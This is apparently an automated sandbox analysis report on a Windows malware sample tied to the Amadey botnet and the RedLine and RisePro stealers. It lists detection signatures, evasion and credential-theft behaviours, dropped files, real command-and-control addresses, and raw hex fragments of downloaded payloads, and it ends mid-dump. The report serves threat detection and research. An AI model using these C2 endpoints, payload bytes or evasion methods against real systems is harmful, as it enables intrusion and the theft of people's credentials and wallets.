Windows Analysis Report
SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe
Analysis ID: 1428500
MD5: f854143c49c4d2fa4cf73bab97ba8d3a
SHA1: 62454e89cf9b2558347e2179f49fb4a56f4762ec
SHA256: 8c8afd00e6087780e4ee0a36f170ba06f13ba6d0c46cd2119b876e88d40c24e3
Tags: Amadeyexe

Detection

Amadey, RedLine, RisePro Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
Yara detected RedLine Stealer
Yara detected RisePro Stealer
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Connects to many ports of the same IP (likely port scanning)
Creates multiple autostart registry keys
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Sigma detected: Suspicious Add Scheduled Task Parent
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

AV Detection

Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Avira: detected
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Avira: detection malicious, Label: HEUR/AGEN.1305500
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe Avira: detection malicious, Label: HEUR/AGEN.1305500
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Avira: detection malicious, Label: TR/AutoIt.zstul
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll Avira: detection malicious, Label: TR/PSW.Agent.szlsq
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amert[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll Avira: detection malicious, Label: TR/ClipBanker.tbxxw
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll Avira: detection malicious, Label: TR/PSW.Agent.szlsq
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll Avira: detection malicious, Label: TR/ClipBanker.pjgxt
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/AutoIt.zstul
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 52.0.build12.exe.3c0000.0.unpack Malware Configuration Extractor: RedLine {"C2 url": ["b-stamps.gl.at.ply.gg:30946"], "Bot Id": "Traffic"}
Source: rundll32.exe.3356.8.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://193.233.132.56/Pneh2sXQk0/index.php"]}
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Virustotal: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll Virustotal: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Virustotal: Detection: 32%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe Virustotal: Detection: 77%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll Virustotal: Detection: 80%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll Virustotal: Detection: 80%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sarra[1].exe Virustotal: Detection: 40%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe Virustotal: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amert[1].exe Virustotal: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll Virustotal: Detection: 78%
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Virustotal: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Virustotal: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Virustotal: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Virustotal: Detection: 32%
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Virustotal: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Virustotal: Detection: 77%
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Virustotal: Detection: 77%
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Virustotal: Detection: 42%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll Virustotal: Detection: 80%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Virustotal: Detection: 78%
Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll Virustotal: Detection: 81%
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Virustotal: Detection: 54%
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amert[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Joe Sandbox ML: detected
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sarra[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Joe Sandbox ML: detected
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Joe Sandbox ML: detected
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49709 version: TLS 1.0
Source: unknown HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49780 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.29.15:443 -> 192.168.2.5:49801 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.29.15:443 -> 192.168.2.5:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49811 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49813 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49825 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.29.15:443 -> 192.168.2.5:49840 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49874 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49878 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49923 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49925 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.189.173.25:443 -> 192.168.2.5:50555 version: TLS 1.2
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Videos\desktop.ini
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Music\desktop.ini
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\OneDrive\desktop.ini
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local

Networking

Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.5:49713 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 193.233.132.56:80 -> 192.168.2.5:49713
Source: Traffic Snort IDS: 2855239 ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) 192.168.2.5:49717 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2856151 ETPRO TROJAN Amadey CnC Activity M7 192.168.2.5:49718 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49719 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49721 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49741 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.5:49762 -> 147.45.47.93:58709
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49762
Source: Traffic Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 147.45.47.93:58709 -> 192.168.2.5:49762
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49768 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49773
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49774
Source: Traffic Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 147.45.47.93:58709 -> 192.168.2.5:49773
Source: Traffic Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 147.45.47.93:58709 -> 192.168.2.5:49774
Source: Traffic Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.5:49762 -> 147.45.47.93:58709
Source: Traffic Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.5:49773 -> 147.45.47.93:58709
Source: Traffic Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.5:49774 -> 147.45.47.93:58709
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49809
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49822
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49870
Source: Traffic Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 193.233.132.167:80 -> 192.168.2.5:49869
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49880 -> 193.233.132.167:80
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49886 -> 193.233.132.167:80
Source: Traffic Snort IDS: 2856151 ETPRO TROJAN Amadey CnC Activity M7 192.168.2.5:49890 -> 193.233.132.167:80
Source: Traffic Snort IDS: 2855239 ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) 192.168.2.5:49892 -> 193.233.132.167:80
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49918
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.5:50734 -> 193.233.132.167:80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.56 80
Source: C:\Windows\System32\rundll32.exe Network Connect: 193.233.132.167 80
Source: Malware configuration extractor IPs: 193.233.132.56
Source: Malware configuration extractor URLs: b-stamps.gl.at.ply.gg:30946
Source: global traffic TCP traffic: 147.45.47.93 ports 0,5,7,8,58709,9
Source: global traffic TCP traffic: 147.185.221.19 ports 0,3,4,6,9,30946
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 49889 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49889
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 49998 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49998
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49997
Source: unknown Network traffic detected: HTTP traffic on port 50095 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 50094 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 50462 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 50461 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50094
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50095
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50461
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50462
Source: unknown Network traffic detected: HTTP traffic on port 50784 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 50785 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50784
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50785
Source: global traffic TCP traffic: 192.168.2.5:49762 -> 147.45.47.93:58709
Source: global traffic TCP traffic: 192.168.2.5:49883 -> 147.185.221.19:30946
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:29:03 GMTContent-Type: application/octet-streamContent-Length: 1285632Last-Modified: Sun, 03 Mar 2024 11:54:33 GMTConnection: keep-aliveETag: "65e464f9-139e00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:29:04 GMTContent-Type: application/octet-streamContent-Length: 1905152Last-Modified: Fri, 19 Apr 2024 00:37:12 GMTConnection: keep-aliveETag: "6621bcb8-1d1200"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:29:06 GMTContent-Type: application/octet-streamContent-Length: 112128Last-Modified: Sun, 03 Mar 2024 11:54:32 GMTConnection: keep-aliveETag: "65e464f8-1b600"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:29:12 GMTContent-Type: application/octet-streamContent-Length: 1166336Last-Modified: Fri, 19 Apr 2024 00:36:20 GMTConnection: keep-aliveETag: "6621bc84-11cc00"Accept-Ranges: bytes
00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c 61 04 00 00 40 0d 00 00 62 04 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 11 00 00 76 00 00 00 56 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:29:16 GMTContent-Type: application/octet-streamContent-Length: 2295808Last-Modified: Fri, 19 Apr 2024 00:36:37 GMTConnection: keep-aliveETag: "6621bc95-230800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 9f 1a ea 14 fe 74 b9 14 fe 74 b9 14 fe 74 b9 5f 86 77 b8 1f fe 74 b9 5f 86 71 b8 d4 fe 74 b9 5f 86 73 b8 15 fe 74 b9 d6 7f 89 b9 10 fe 74 b9 d6 7f 70 b8 07 fe 74 b9 d6 7f 77 b8 0e fe 74 b9 d6 7f 71 b8 4f fe 74 b9 5f 86 70 b8 0c fe 74 b9 5f 86 72 b8 15 fe 74 b9 5f 86 75 b8 0f fe 74 b9 14 fe 75 b9 34 ff 74 b9 e7 7c 7d b8 08 fe 74 b9 e7 7c 74 b8 15 fe 74 b9 e7 7c 8b b9 15 fe 74 b9 14 fe e3 b9 15 fe 74 b9 e7 7c 76 b8 15 fe 74 b9 52 69 63 68 14 fe 74 b9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 0c 9a 1f 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 34 11 00 00 32 04 00 00 00 00 00 00 10 58 00 00 10 00 00 00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 58 00 00 04 00 00 0a 19 23 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 54 4d 57 00 4c 00 00 00 6d 10 15 00 95 00 00 00 00 50 14 00 ec b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 4d 57 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 4c 57 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 e4 13 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 14 00 00 10 00 00 00 3e 09 00 00 10 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ec b5 00 00 00 50 14 00 00 82 00 00 00 4e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 15 00 00 02 00 00 00 d0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 20 15 00 00 02 00 00 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 6a 77 79 65 79 6e 69 00 40 19 00 00 d0 3e 00 00 32 19 00 00 d4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 6f 65 75 71 78 77 62 00 10 00 00 00 10 58 00 00 02 00 00 00 06 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:29:22 GMTContent-Type: application/octet-streamContent-Length: 2310656Last-Modified: Fri, 19 Apr 2024 00:36:46 GMTConnection: keep-aliveETag: "6621bc9e-234200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 9f 1a ea 14 fe 74 b9 14 fe 74 b9 14 fe 74 b9 5f 86 77 b8 1f fe 74 b9 5f 86 71 b8 d4 fe 74 b9 5f 86 73 b8 15 fe 74 b9 d6 7f 89 b9 10 fe 74 b9 d6 7f 70 b8 07 fe 74 b9 d6 7f 77 b8 0e fe 74 b9 d6 7f 71 b8 4f fe 74 b9 5f 86 70 b8 0c fe 74 b9 5f 86 72 b8 15 fe 74 b9 5f 86 75 b8 0f fe 74 b9 14 fe 75 b9 34 ff 74 b9 e7 7c 7d b8 08 fe 74 b9 e7 7c 74 b8 15 fe 74 b9 e7 7c 8b b9 15 fe 74 b9 14 fe e3 b9 15 fe 74 b9 e7 7c 76 b8 15 fe 74 b9 52 69 63 68 14 fe 74 b9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 0c 9a 1f 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 34 11 00 00 48 04 00 00 00 00 00 00 00 59 00 00 10 00 00 00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 59 00 00 04 00 00 a3 8c 23 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 cc 4a 